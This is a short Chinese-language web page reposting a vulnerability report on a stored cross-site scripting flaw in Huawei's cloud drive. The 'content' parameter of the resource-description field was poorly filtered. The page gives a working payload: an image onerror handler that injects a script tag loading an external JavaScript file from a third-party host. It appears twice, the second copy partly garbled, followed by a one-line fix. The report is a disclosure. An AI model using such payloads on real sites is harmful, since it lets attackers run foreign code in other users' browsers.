• 选择风格
  • 加入收藏
  • 繁體中文
  • 网站地图
    • 当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

    华为网盘存储型XSS,可加载外部JS

    时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

    上次提交么说清楚,不好意思,涛涛电脑知识网,
    在“资源描述”的地方对提交的content参数过滤不严,导致XSS。
    漏洞代码:
    <img src="2.jps" onerror="var a = document.getElementsByTagName('head').item(0);
    var b = document.createElement('script');
    b.type = 'text/javascript';
    b.src=' www.2cto.com /db.js';
    a.appendChild(b);">

    只测试了IE和GOOGLE浏览器,其他未测试。

     







    过滤不严,导致XSS。
    漏洞代码:
     

    <img src="2.jps" onerror="var a = document.getElementsByTagName('head').item(0);
    var b = document.createElement('script');
    b.type = 'text/javascript';
    b.src='';
    a.appendChild(b);">



    只测试了IE和GOOGLE浏览器,www.xuhantao.com,其他未测试。



    修复方案:

    服务端也验证

  • 上一篇:szwyadmin程序cookies欺骗漏洞拿shell
  • 下一篇:新浪微博子栏目漏洞可获取数据和cookie
    • 相关文章
    • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1